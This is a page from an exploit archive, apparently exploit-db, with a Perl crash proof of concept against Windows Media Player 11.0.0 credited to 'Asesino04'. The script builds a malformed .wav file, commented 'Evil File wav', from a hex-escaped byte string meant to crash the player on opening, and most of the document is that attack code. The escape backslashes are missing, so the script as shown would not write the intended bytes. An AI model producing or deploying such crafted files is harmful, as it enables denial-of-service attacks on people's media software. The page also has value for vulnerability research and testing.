[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Windows Media Player 11.0.0 (.wav) - Crash PoC
# Published : 2013-05-13
# Author :
# Previous Title : WinAmp 5.63 - Invalid Pointer Dereference
# Next Title : Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak


# Title : Windows Media Player 11.0.0 (.wav) Crash PoC
# Date: 2013-01-12
# Software Link: http://windows.microsoft.com/fr-fr/windows/windows-media-player
# Vendor : http://www.commentcamarche.net/download/start/telecharger-34055100-windows-media-player
# Author: Asesino04
# Tested on: Windows XP SP2
# Home: www.arab47.com
# Greeting To :All Arab47 memberz/ 3xp1r3 Cyber Army / Newbie3viLc063s / Inj3ct0r Team
 
 
# Exploit Code (perl) : 
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "nn";               
print "    |=======================================================|n";
print "    |= [!] Name : Windows Media Player 11.0 ||.wav         =|n";
print "    |= [!] Exploit :      Crash Poc                        =|n";
print "    |= [!] Author  :     Asesino04                         =|n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|n";
print "    |=======================================================|n";
sleep(2);
print "n";
# Creating ...
my $PoC =
"x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01".
"x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E".
"x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22".
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01".
"x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E".
"x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22".
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x66x66x66x00";
open(file , ">", "PoC.wav"); # Evil File wav
print file $PoC;
print "n [+] File successfully created!n" or die print "n [-] OupsS! File is Not Created !! ";
close(file);

# Contact :
------------------
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com